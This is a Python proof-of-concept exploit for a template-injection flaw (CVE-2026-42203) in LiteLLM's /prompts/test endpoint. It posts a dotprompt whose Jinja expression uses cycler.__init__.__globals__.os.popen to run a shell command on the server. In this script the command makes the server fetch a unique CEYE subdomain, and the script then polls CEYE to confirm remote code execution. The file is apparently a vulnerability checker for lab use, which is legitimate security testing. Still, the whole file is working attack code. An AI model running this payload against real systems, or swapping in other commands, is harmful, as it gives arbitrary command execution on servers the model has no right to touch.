#!/usr/bin/env python3
"""
Minimal LiteLLM CVE-2026-42203 /prompts/test SSTI PoC.

Proof strategy:
  Execute Python code that requests:
    http://{random}.{your-ceye-domain}/

  Then query CEYE request records with filter={random}.
  If CEYE received the callback, the SSTI command execution path is confirmed.

CEYE domain/token and the LiteLLM API key are intentionally not hardcoded.
Pass them with CLI flags or environment variables when running in your lab.

Exit codes:
  0  callback observed (vulnerable)
  1  no callback observed although target and CEYE were both reachable
  2  configuration error (missing flag/env var or missing dependency)
  3  inconclusive (CEYE could not be queried or the trigger request failed)
"""

from __future__ import annotations

import argparse
import json
import os
import secrets
import string
import sys
import threading
import time
from typing import Any, Dict, Optional, Tuple

try:
    import requests
except ImportError:  # reported as a config error in main() so --help still works
    requests = None  # type: ignore[assignment]


DEFAULT_TARGET = "http://127.0.0.1:4000"
DEFAULT_MODEL = "gpt-3.5-turbo"
DEFAULT_API_KEY_ENV = "LITELLM_API_KEY"
DEFAULT_CEYE_DOMAIN_ENV = "CEYE_DOMAIN"
DEFAULT_CEYE_TOKEN_ENV = "CEYE_TOKEN"
# NOTE(review): CEYE's public API docs appear to list "dns" and "http" as
# record types -- confirm that "request" is accepted by the service.
DEFAULT_CEYE_TYPE = "request"
DEFAULT_TIMEOUT = 10.0
DEFAULT_WAIT = 20.0
DEFAULT_INTERVAL = 3.0

# NOTE(review): plain HTTP means the CEYE token travels unencrypted; switch to
# https:// once it is confirmed that the CEYE API serves TLS.
CEYE_RECORDS_URL = "http://api.ceye.io/v1/records"

EXIT_VULNERABLE = 0
EXIT_NOT_VULNERABLE = 1
EXIT_CONFIG_ERROR = 2
EXIT_INCONCLUSIVE = 3


def random_filter(length: int = 12) -> str:
    """Return a random lowercase-alphanumeric label of ``length`` characters.

    The label is used both as the callback sub-domain and as the CEYE
    ``filter`` value, so one run's callback can be told apart from another's.
    """
    alphabet = string.ascii_lowercase + string.digits
    return "".join(secrets.choice(alphabet) for _ in range(length))


def quote_for_jinja_single_string(value: str) -> str:
    """Escape ``value`` for embedding inside a single-quoted template string.

    Backslashes are doubled first so the escapes added for quotes and
    newlines are not themselves re-escaped.
    """
    return value.replace("\\", "\\\\").replace("'", "\\'").replace("\n", "\\n")


def build_payload(model: str, command: str) -> Dict[str, Any]:
    """Build the JSON body posted to ``/prompts/test``.

    Args:
        model: Value written to the ``model`` key of the dotprompt front matter.
        command: Shell command embedded (after escaping) in the template
            expression.

    Returns:
        A dict with ``dotprompt_content`` and an empty ``prompt_variables``.
    """
    command = quote_for_jinja_single_string(command)
    ssti = "{{ cycler.__init__.__globals__.os.popen('" + command + "').read() }}"
    return {
        "dotprompt_content": f"""---
model: {model}
temperature: 0
---

User: {ssti}
""",
        "prompt_variables": {},
    }


def build_python_http_command(url: str) -> str:
    """Return a ``python3 -c`` one-liner that performs a GET request to ``url``."""
    return (
        "python3 -c "
        f"\"import urllib.request; urllib.request.urlopen('{url}', timeout=5).read()\""
    )


def trigger_payload(
    target: str,
    api_key: str,
    body: Dict[str, Any],
    timeout: float,
    verify_tls: bool,
    outcome: Optional[Dict[str, Any]] = None,
) -> None:
    """POST ``body`` to ``{target}/prompts/test`` and report what happened.

    Request errors are printed rather than raised because this function runs
    in a background thread (see ``start_trigger_payload``).

    Args:
        target: Base URL of the service; a trailing slash is tolerated.
        api_key: Sent as a ``Bearer`` token in the ``Authorization`` header.
        body: JSON-serialisable request body.
        timeout: Timeout in seconds passed to ``requests.post``.
        verify_tls: Whether to verify the target's TLS certificate.
        outcome: Optional dict that receives ``"status_code"`` on a completed
            request or ``"error"`` (a string) when the request failed.
    """
    endpoint = target.rstrip("/") + "/prompts/test"
    try:
        response = requests.post(
            endpoint,
            headers={
                "Authorization": f"Bearer {api_key}",
                "Content-Type": "application/json",
            },
            json=body,
            timeout=timeout,
            verify=verify_tls,
        )
    except requests.RequestException as exc:
        print(f"[!] Background trigger request error: {exc}")
        if outcome is not None:
            outcome["error"] = str(exc)
        return

    print(f"[*] Target responded with HTTP {response.status_code}")
    if outcome is not None:
        outcome["status_code"] = response.status_code


def start_trigger_payload(
    target: str,
    api_key: str,
    body: Dict[str, Any],
    timeout: float,
    verify_tls: bool,
    outcome: Optional[Dict[str, Any]] = None,
) -> None:
    """Run ``trigger_payload`` in a daemon thread and return immediately.

    A daemon thread is used so CEYE polling can start right away and a hung
    target cannot keep the process alive after ``main`` returns.
    ``outcome`` is forwarded to ``trigger_payload`` unchanged.
    """
    endpoint = target.rstrip("/") + "/prompts/test"
    thread = threading.Thread(
        target=trigger_payload,
        kwargs={
            "target": target,
            "api_key": api_key,
            "body": body,
            "timeout": timeout,
            "verify_tls": verify_tls,
            "outcome": outcome,
        },
        daemon=True,
    )
    thread.start()
    print(f"[*] Sending payload to: POST {endpoint}")


def query_ceye(
    token: str,
    record_type: str,
    filter_value: str,
    timeout: float,
) -> Dict[str, Any]:
    """Fetch CEYE records matching ``filter_value`` and return the parsed JSON.

    Raises:
        requests.RequestException: On connection errors or a non-2xx status.
        ValueError: If the response body is not valid JSON.
    """
    response = requests.get(
        CEYE_RECORDS_URL,
        params={
            "token": token,
            "type": record_type,
            "filter": filter_value,
        },
        timeout=timeout,
    )
    response.raise_for_status()
    return response.json()


def describe_ceye_query(record_type: str, filter_value: str) -> str:
    """Return a printable form of the CEYE query URL with the token redacted.

    The token is a credential, so it is kept out of stdout and any log that
    captures it.
    """
    return (
        f"{CEYE_RECORDS_URL}?token=<redacted>"
        f"&type={record_type}&filter={filter_value}"
    )


def ceye_has_callback(data: Dict[str, Any], filter_value: str) -> bool:
    """Return True if ``filter_value`` occurs anywhere in the serialised ``data``.

    NOTE(review): this is a substring match over the whole response, so a
    response that merely echoes the filter back would also match -- confirm
    against the real CEYE response shape.
    """
    return filter_value in json.dumps(data, ensure_ascii=False)


def poll_ceye_status(
    token: str,
    record_type: str,
    filter_value: str,
    wait: float,
    interval: float,
    timeout: float,
) -> Tuple[bool, bool]:
    """Poll CEYE until a matching record appears or ``wait`` seconds elapse.

    At least one query is always made, and a final query is made at the
    deadline so a callback arriving during the last sleep is not missed.

    Returns:
        ``(matched, any_query_succeeded)``. The second flag lets the caller
        tell "no callback" apart from "CEYE could not be queried at all".
    """
    # Monotonic clock: the deadline must not move if the wall clock is adjusted.
    deadline = time.monotonic() + wait
    last_error: Optional[str] = None
    any_query_succeeded = False

    while True:
        try:
            data = query_ceye(token, record_type, filter_value, timeout)
        except (requests.RequestException, ValueError) as exc:
            last_error = str(exc)
        else:
            any_query_succeeded = True
            if ceye_has_callback(data, filter_value):
                print(f"[+] CEYE matched filter: {filter_value}")
                print(json.dumps(data, ensure_ascii=False, indent=2))
                return True, True

        remaining = deadline - time.monotonic()
        if remaining <= 0:
            break
        # Never sleep past the deadline.
        time.sleep(min(interval, remaining))

    if last_error:
        print(f"[!] Last CEYE query error: {last_error}")
    return False, any_query_succeeded


def poll_ceye(
    token: str,
    record_type: str,
    filter_value: str,
    wait: float,
    interval: float,
    timeout: float,
) -> bool:
    """Return True if CEYE recorded a matching callback within ``wait`` seconds.

    Thin wrapper around ``poll_ceye_status`` for callers that only need the
    match flag.
    """
    matched, _ = poll_ceye_status(
        token, record_type, filter_value, wait, interval, timeout
    )
    return matched


def decide_exit_code(
    matched: bool,
    ceye_reachable: bool,
    trigger_error: Optional[str] = None,
) -> int:
    """Map the observed facts to one of the ``EXIT_*`` codes.

    A match always wins. Without a match the result is only a trustworthy
    negative when CEYE answered at least once and the trigger request did not
    fail; otherwise the run is inconclusive.
    """
    if matched:
        return EXIT_VULNERABLE
    if not ceye_reachable or trigger_error:
        return EXIT_INCONCLUSIVE
    return EXIT_NOT_VULNERABLE


def parse_args() -> argparse.Namespace:
    """Parse command-line flags; secrets default to their environment variables."""
    parser = argparse.ArgumentParser(
        description="Minimal LiteLLM /prompts/test SSTI PoC with CEYE request callback."
    )
    parser.add_argument("-t", "--target", default=DEFAULT_TARGET, help=f"LiteLLM base URL, default: {DEFAULT_TARGET}")
    parser.add_argument(
        "--auth",
        "--api-key",
        dest="api_key",
        default=os.getenv(DEFAULT_API_KEY_ENV, ""),
        help=f"LiteLLM key allowed to call /prompts/test. Can also be set with {DEFAULT_API_KEY_ENV}.",
    )
    parser.add_argument("--model", default=DEFAULT_MODEL, help=f"dotprompt model value, default: {DEFAULT_MODEL}")
    parser.add_argument(
        "--ceye-token",
        default=os.getenv(DEFAULT_CEYE_TOKEN_ENV, ""),
        help=f"CEYE API token. Can also be set with {DEFAULT_CEYE_TOKEN_ENV}.",
    )
    parser.add_argument(
        "--ceye-domain",
        default=os.getenv(DEFAULT_CEYE_DOMAIN_ENV, ""),
        help=f"CEYE domain. Can also be set with {DEFAULT_CEYE_DOMAIN_ENV}.",
    )
    parser.add_argument("--ceye-type", default=DEFAULT_CEYE_TYPE, help=f"CEYE record type, default: {DEFAULT_CEYE_TYPE}")
    parser.add_argument("--timeout", type=float, default=DEFAULT_TIMEOUT, help=f"HTTP timeout, default: {DEFAULT_TIMEOUT}s")
    parser.add_argument("--wait", type=float, default=DEFAULT_WAIT, help=f"Seconds to wait for CEYE callback, default: {DEFAULT_WAIT}s")
    parser.add_argument("--interval", type=float, default=DEFAULT_INTERVAL, help=f"CEYE polling interval, default: {DEFAULT_INTERVAL}s")
    parser.add_argument("--insecure", action="store_true", help="Disable TLS certificate verification for target request")
    return parser.parse_args()


def validate_args(args: argparse.Namespace) -> Optional[str]:
    """Return a message for the first invalid argument, or None if all are valid."""
    if not args.target.strip():
        return "--target must not be empty"
    if not args.api_key.strip():
        return "--auth/--api-key must not be empty"
    if not args.ceye_token.strip():
        return "--ceye-token must not be empty"
    if not args.ceye_domain.strip():
        return "--ceye-domain must not be empty"
    if args.timeout <= 0:
        return "--timeout must be greater than 0"
    if args.wait <= 0:
        return "--wait must be greater than 0"
    if args.interval <= 0:
        return "--interval must be greater than 0"
    return None


def main() -> int:
    """Run the check end to end and return the process exit code."""
    args = parse_args()
    validation_error = validate_args(args)
    if validation_error:
        print(f"[CONFIG_ERROR] {validation_error}", file=sys.stderr)
        return EXIT_CONFIG_ERROR
    if requests is None:
        print(
            "[CONFIG_ERROR] the 'requests' package is required (pip install requests)",
            file=sys.stderr,
        )
        return EXIT_CONFIG_ERROR

    filter_value = random_filter()
    callback_url = f"http://{filter_value}.{args.ceye_domain}/"
    command = build_python_http_command(callback_url)
    body = build_payload(args.model, command)

    print(f"[*] Python payload: {command}")
    print("[*] CEYE query: " + describe_ceye_query(args.ceye_type, filter_value))

    # Filled in by the background thread. If that thread is still running when
    # polling ends (timeout longer than wait), no error has been recorded yet.
    outcome: Dict[str, Any] = {}
    start_trigger_payload(
        target=args.target,
        api_key=args.api_key,
        body=body,
        timeout=args.timeout,
        verify_tls=not args.insecure,
        outcome=outcome,
    )

    matched, ceye_reachable = poll_ceye_status(
        token=args.ceye_token,
        record_type=args.ceye_type,
        filter_value=filter_value,
        wait=args.wait,
        interval=args.interval,
        timeout=args.timeout,
    )

    exit_code = decide_exit_code(matched, ceye_reachable, outcome.get("error"))
    if exit_code == EXIT_VULNERABLE:
        print("[VULNERABLE] CEYE received the callback request.")
    elif exit_code == EXIT_INCONCLUSIVE:
        if not ceye_reachable:
            reason = "no CEYE query succeeded"
        else:
            reason = "the trigger request to the target failed"
        print(f"[INCONCLUSIVE] Could not confirm either way: {reason}.")
    else:
        print("[NOT_VULNERABLE] CEYE did not receive the callback request within the wait window.")
    return exit_code


if __name__ == "__main__":
    raise SystemExit(main())